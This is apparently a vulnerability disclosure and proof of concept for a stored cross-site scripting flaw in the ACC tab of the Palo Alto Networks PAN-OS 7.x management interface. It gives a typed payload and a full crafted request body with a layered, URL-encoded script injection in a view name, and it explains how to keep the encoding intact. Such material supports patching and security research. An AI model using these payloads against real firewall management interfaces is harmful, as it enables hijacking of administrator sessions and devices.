Information

Cross-site scripting (XSS) vulnerability in the management interface in Palo Alto Networks PAN-OS 7.x before 7.0.8 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.

Crash Dump

None

PoC

The vulnerability is in the ACC tab (the second tab in the management web interface). The name given to a custom ACC view is rendered back into the page without escaping, so the payload fires as soon as the view is shown. A valid management session is required, which matches the "remote authenticated users" wording of the advisory.

1) Open the ACC tab.
2) Click the add button and, as the tab name, enter: <svg/onload=alert("xss")>

Alternatively, submit the same view state directly with a crafted request body like the following (the request that saves the ACC state, parameter name ACC_STATE_ID):

id=1&user=user&session=session&data=%5B%7B%22name%22%3A%22ACC_STATE_ID%22%2C%22value%22%3A%22o%253AstateArr%253Da%25253Ao%2525253AviewName%2525253Ds%252525253ANetwork%2525252520Activity%2525255EviewConfig%2525253Da%252525253Aa%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Application_Usage%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_User_Activity%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Sources%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Destinations%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Source_Regions%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Dest_Regions%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Host_Information%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Rule_Usage%25255Eo%2525253AviewName%2525253Ds%252525253AThreat%2525252520Activity%2525255EviewConfig%2525253Da%252525253Aa%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Threat_Activity%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_WildFire_Activity_By_FileType%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_WildFire_Activity_By_Application%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Hosts_Visiting_Malware_URLs%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Hosts_Matching_CC_DNS_Sigs%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Apps_Using_NonStandard_Ports%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Rules_Allowing_Apps_On_NonStandard_Ports%25255Eo%2525253AviewName%2525253Ds%252525253ABlocked%2525252520Activity%2525255EviewConfig%2525253Da%252525253Aa%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_Apps%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_User_Activity%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_Threats%25252525255Ea%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Blocked_Content%252525255Ea%25252525253Aa%2525252525253Ao%252525252525253AxtypeConfig%252525252525253Ds%25252525252525253AACC_Deny_Rule_Activity%25255Eo%2525253AviewName%2525253Ds%252525253A%252525253Cimg%2525252520src%252525253Da%2525252520onerror%252525253Dalert%2525252528%2525252522XSS%2525252522%2525252529%252525253E%2525255EviewConfig%2525253Da%252525253A%22%7D%5D

The XSS string is the last viewName value, %252525253Cimg%2525252520src%252525253Da%2525252520onerror%252525253Dalert%2525252528%2525252522XSS%2525252522%2525252529%252525253E, which decodes to <img src=a onerror=alert("XSS")>.

The one rule: keep the four extra layers of URL encoding on the payload. The data parameter itself is form-encoded once, and the ACC state inside it is a nested serialization in which every nested value is URL-encoded once more, so the view name ends up under four additional layers. %2525252522, for example, only becomes a double quote (") after five successive decodes. Apart from that, the attack vector is simple and straightforward.



References:
https://securityadvisories.paloaltonetworks.com/Home/Detail/42